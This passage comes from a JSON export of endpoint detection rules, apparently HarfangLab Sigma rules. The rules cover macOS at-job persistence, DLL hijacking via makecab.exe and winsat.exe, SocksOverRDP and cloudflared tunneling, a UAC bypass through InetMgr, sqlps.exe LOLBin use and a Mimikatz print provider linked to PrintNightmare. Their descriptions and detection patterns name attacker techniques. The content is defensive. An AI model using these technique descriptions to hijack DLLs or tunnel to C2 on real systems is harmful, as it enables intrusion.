"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598362Z",
"creation_date": "2026-03-23T11:45:34.598366Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598374Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1053/002/"
],
"name": "t1053_002_at_jobs_created.yml",
"content": "title: At Jobs Created\nid: 15f0e956-c482-487d-a3f5-28d5c667c6a3\ndescription: |\n Detects the creation of an at job file.\n Adversaries may use at to execute programs at system startup or on a scheduled basis for persistence.\n It is recommended to check the content of the file for suspicious command and the activity of the process creating the file for other suspicious actions.\nreferences:\n - https://attack.mitre.org/techniques/T1053/002/\ndate: 2024/07/23\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1053.002\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection_files:\n - Path|startswith: '/private/var/at/jobs/'\n - TargetPath|startswith: '/private/var/at/jobs/'\n\n selection_access:\n Kind:\n - 'create'\n - 'rename'\n ProcessImage|contains: '?'\n\n condition: all of selection_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "15f0e956-c482-487d-a3f5-28d5c667c6a3",
"rule_name": "At Jobs Created",
"rule_description": "Detects the creation of an at job file.\nAdversaries may use the at utility to execute programs at system startup or on a scheduled basis for persistence.\nIt is recommended to check the content of the file for suspicious commands and to review the activity of the process that created the file for other suspicious actions.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1053.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "15f6d712-e496-4981-8fd1-3626e0c36d24",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097842Z",
"creation_date": "2026-03-23T11:45:34.097844Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097848Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_makecab.yml",
"content": "title: DLL Hijacking via makecab.exe\nid: 15f6d712-e496-4981-8fd1-3626e0c36d24\ndescription: |\n Detects potential Windows DLL Hijacking via makecab.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'makecab.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\Cabinet.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "15f6d712-e496-4981-8fd1-3626e0c36d24",
"rule_name": "DLL Hijacking via makecab.exe",
"rule_description": "Detects potential Windows DLL Hijacking via makecab.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "15fa5274-bd22-4eb6-862a-dfc8deceaaf8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082797Z",
"creation_date": "2026-03-23T11:45:34.082799Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082804Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/nccgroup/SocksOverRDP",
"https://attack.mitre.org/techniques/T1572"
],
"name": "t1572_socks_over_rdp_configuration_set.yml",
"content": "title: SocksOverRDP Registry Configuration Set\nid: 15fa5274-bd22-4eb6-862a-dfc8deceaaf8\ndescription: |\n Detects the SocksOverRDP registry configuration being set in registry.\n SocksOverRDP is an RDP tunneling tool that can be registered via \"regsvr32.exe\" with its DLL, that is usually placed in the \"%SystemRoot%\\system32\\\"\" or \"%SystemRoot%\\SysWoW64\\\" folder.\n When registered, the plugin listens on the port specified in the \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Terminal Server Client\\Default\\AddIns\\SocksOverRDP-Plugin\" registry key.\n Adversaries may use the RDP protocol to route traffic and communicate with their C2 as a way to bypass network protections.\n It is recommended to inspect the network traffic of the process, the registry paths mentioned above, the registry key, and any \"regsvr32.exe\" related alerts to determine if this plugin was installed maliciously.\nreferences:\n - https://github.com/nccgroup/SocksOverRDP\n - https://attack.mitre.org/techniques/T1572\ndate: 2025/09/24\nmodified: 2025/09/30\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1572\n - attack.lateral_movement\n - attack.t1021.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Tunneling\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|contains: '\\AddIns\\SocksOverRDP-Plugin'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "15fa5274-bd22-4eb6-862a-dfc8deceaaf8",
"rule_name": "SocksOverRDP Registry Configuration Set",
"rule_description": "Detects the SocksOverRDP registry configuration being set in the registry.\nSocksOverRDP is an RDP tunneling tool that can be registered via \"regsvr32.exe\" with its DLL, which is usually placed in the \"%SystemRoot%\\system32\\\" or \"%SystemRoot%\\SysWOW64\\\" folder.\nWhen registered, the plugin listens on the port specified in the \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Terminal Server Client\\Default\\AddIns\\SocksOverRDP-Plugin\" registry key.\nAdversaries may use the RDP protocol to route traffic and communicate with their C2 as a way to bypass network protections.\nIt is recommended to inspect the network traffic of the process, the file paths mentioned above, the registry key, and any \"regsvr32.exe\" related alerts to determine if this plugin was installed maliciously.\n",
"rule_creation_date": "2025-09-24",
"rule_modified_date": "2025-09-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.001",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "161d8bc5-7221-45bb-8d1d-89c6eae319c4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619209Z",
"creation_date": "2026-03-23T11:45:34.619211Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619215Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/cloudflare/cloudflared",
"https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/",
"https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/",
"https://www.intrinsec.com/akira_ransomware/",
"https://attack.mitre.org/techniques/T1102/"
],
"name": "t1102_cloudflare_tunnel.yml",
"content": "title: Suspicious Cloudflare Binary Execution\nid: 161d8bc5-7221-45bb-8d1d-89c6eae319c4\ndescription: |\n Detects the suspicious execution of a Cloudflare binary to establish a tunnel, a technique commonly used by threat actors to create stealthy, outbound-only connections for remote access and data exfiltration.\n This technique allows attackers to bypass firewalls and maintain persistent access to compromised systems without exposing public IP addresses.\n It is recommended to investigate the context in which this command was executed and to verify if the usage of this tool is legitimate in your infrastructure.\nreferences:\n - https://github.com/cloudflare/cloudflared\n - https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/\n - https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/\n - https://www.intrinsec.com/akira_ransomware/\n - https://attack.mitre.org/techniques/T1102/\ndate: 2025/05/15\nmodified: 2025/06/11\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n Image|endswith:\n - '\\cloudflared.exe'\n - '\\cloudflared-windows-386.exe'\n - '\\cloudflared-windows-amd64.exe'\n\n selection_imphash:\n Imphash:\n - '2548C430C08A1B7D76EDE5D863ADB956'\n - 'fc22e4f95641f6606222121e1a8a8508'\n\n selection_run:\n CommandLine|contains|all:\n - ' tunnel '\n - ' run'\n\n selection_token:\n CommandLine|contains:\n - ' --token '\n - ' --token-file '\n - ' --config '\n\n selection_service:\n CommandLine|contains|all:\n - ' service '\n - ' install'\n\n selection_url:\n CommandLine|contains|all:\n - ' tunnel '\n - ' --url '\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n condition: 
(selection_image or selection_imphash) and ((selection_run and selection_token) or selection_service or selection_url) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "161d8bc5-7221-45bb-8d1d-89c6eae319c4",
"rule_name": "Suspicious Cloudflare Binary Execution",
"rule_description": "Detects the suspicious execution of a Cloudflare binary to establish a tunnel, a technique commonly used by threat actors to create stealthy, outbound-only connections for remote access and data exfiltration.\nThis technique allows attackers to bypass firewalls and maintain persistent access to compromised systems without exposing public IP addresses.\nIt is recommended to investigate the context in which this command was executed and to verify if the usage of this tool is legitimate in your infrastructure.\n",
"rule_creation_date": "2025-05-15",
"rule_modified_date": "2025-06-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1102"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1620a6e2-1bb5-4d3e-a9f4-f8a339518b1d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587736Z",
"creation_date": "2026-03-23T11:45:34.587740Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587748Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_winsat.yml",
"content": "title: DLL Hijacking via winsat.exe\nid: 1620a6e2-1bb5-4d3e-a9f4-f8a339518b1d\ndescription: |\n Detects potential Windows DLL Hijacking via winsat.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'winsat.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\d3d10_1core.dll'\n - '\\d3d10_1.dll'\n - '\\d3d10core.dll'\n - '\\d3d10.dll'\n - '\\d3d11.dll'\n - '\\dxgi.dll'\n - '\\version.dll'\n - '\\winmm.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1620a6e2-1bb5-4d3e-a9f4-f8a339518b1d",
"rule_name": "DLL Hijacking via winsat.exe",
"rule_description": "Detects potential Windows DLL Hijacking via winsat.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1659265d-21ea-4fb4-8440-e0a5ea0f2567",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092433Z",
"creation_date": "2026-03-23T11:45:34.092435Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092440Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME"
],
"name": "t1548_002_uac_bypass_inetmgr.yml",
"content": "title: UAC Bypass Executed via InetMgr\nid: 1659265d-21ea-4fb4-8440-e0a5ea0f2567\ndescription: |\n Detection of UAC bypass for `InetMgr.exe`.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate the process that created the suspicious unsigned DLL mscoree.dll for suspicious activities.\nreferences:\n - https://github.com/hfiref0x/UACME\ndate: 2021/01/08\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: '\\Windows\\System32\\inetsrv\\InetMgr.exe'\n ImageLoaded|endswith: '\\mscoree.dll'\n cond_ms_signed:\n Signed: 'true'\n Signature|contains:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n condition: selection and not cond_ms_signed\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1659265d-21ea-4fb4-8440-e0a5ea0f2567",
"rule_name": "UAC Bypass Executed via InetMgr",
"rule_description": "Detects a UAC bypass via `InetMgr.exe`.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate the process that created the suspicious mscoree.dll (unsigned, or not signed by Microsoft) for suspicious activities.\n",
"rule_creation_date": "2021-01-08",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1677f32b-ab7c-4b86-a079-48c3166975e0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595711Z",
"creation_date": "2026-03-23T11:45:34.595714Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595722Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/",
"https://docs.microsoft.com/en-us/sql/tools/sqlps-utility",
"https://twitter.com/MsftSecIntel/status/1526680337216114693",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1127/"
],
"name": "t1059_001_suspicious_sqlps_execution.yml",
"content": "title: Suspicious sqlps.exe Execution\nid: 1677f32b-ab7c-4b86-a079-48c3166975e0\ndescription: |\n Detects the suspicious execution of the legitimate sqlps.exe Windows binary, a PowerShell wrapper for running SQL-built cmdlets which is a utility included with Microsoft SQL Server.\n Attackers can use this utility as a LOLBin to bypass security restrictions.\n It is recommended to investigate the legitimacy of the process responsible for the execution of sqlps.exe and to analyze child processes.\nreferences:\n - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/\n - https://docs.microsoft.com/en-us/sql/tools/sqlps-utility\n - https://twitter.com/MsftSecIntel/status/1526680337216114693\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1127/\ndate: 2022/06/07\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.defense_evasion\n - attack.t1127\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Sqlps\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # Microsoft SQL Server 100 and 110 are PowerShell v2\n # Microsoft SQL Server 120 and 130 are PowerShell v4\n OriginalFileName: 'SQLPS.exe'\n exclusion_legitimate_parent:\n ParentCommandLine|contains:\n - '\\MSSQL\\Binn\\SQLAGENT.EXE -i '\n - '\\Tools\\Binn\\ManagementStudio\\Ssms.exe'\n - '\\Tools\\Binn\\SQLPS.exe agentjob'\n\n exclusion_interactive_shell:\n ProcessParentImage|endswith:\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\pwsh.exe'\n ProcessGrandparentImage|endswith: '\\explorer.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1677f32b-ab7c-4b86-a079-48c3166975e0",
"rule_name": "Suspicious sqlps.exe Execution",
"rule_description": "Detects the suspicious execution of the legitimate sqlps.exe Windows binary, a PowerShell wrapper for running SQL-built cmdlets which is a utility included with Microsoft SQL Server.\nAttackers can use this utility as a LOLBin to bypass security restrictions.\nIt is recommended to investigate the legitimacy of the process responsible for the execution of sqlps.exe and to analyze child processes.\n",
"rule_creation_date": "2022-06-07",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1127"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1693e403-2800-4cd4-b918-144cf1d96336",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609367Z",
"creation_date": "2026-03-23T11:45:34.609370Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609377Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675",
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1574_spoolsv_mimikatz_provider_load.yml",
"content": "title: Spoolsv Mimikatz Signed Print Provider Loaded\nid: 1693e403-2800-4cd4-b918-144cf1d96336\ndescription: |\n Detects spoolsv loading the mimikatz signed print provider.\n This is a sign of a CVE-2021-1675 post exploitation.\n It is recommended to isolate the affected assets and to look for attacker activities on other hosts.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675\n - https://attack.mitre.org/techniques/T1055/\ndate: 2021/07/06\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1055\n - attack.s0002\n - cve.2021-1675\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Exploit.CVE-2021-1675\n - classification.Windows.Exploit.PrintNightmare\n - classification.Windows.HackTool.Mimikatz\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: '\\spoolsv.exe'\n Signed: 'true'\n Signature|contains: 'Open Source Developer, Benjamin Delpy'\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\\\?\\\\*'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1693e403-2800-4cd4-b918-144cf1d96336",
"rule_name": "Spoolsv Mimikatz Signed Print Provider Loaded",
"rule_description": "Detects spoolsv loading the mimikatz signed print provider.\nThis is a sign of a CVE-2021-1675 post exploitation.\nIt is recommended to isolate the affected assets and to look for attacker activities on other hosts.\n",
"rule_creation_date": "2021-07-06",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "16a70c78-b3ad-445a-bef6-ca597bfdb2b3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080546Z",
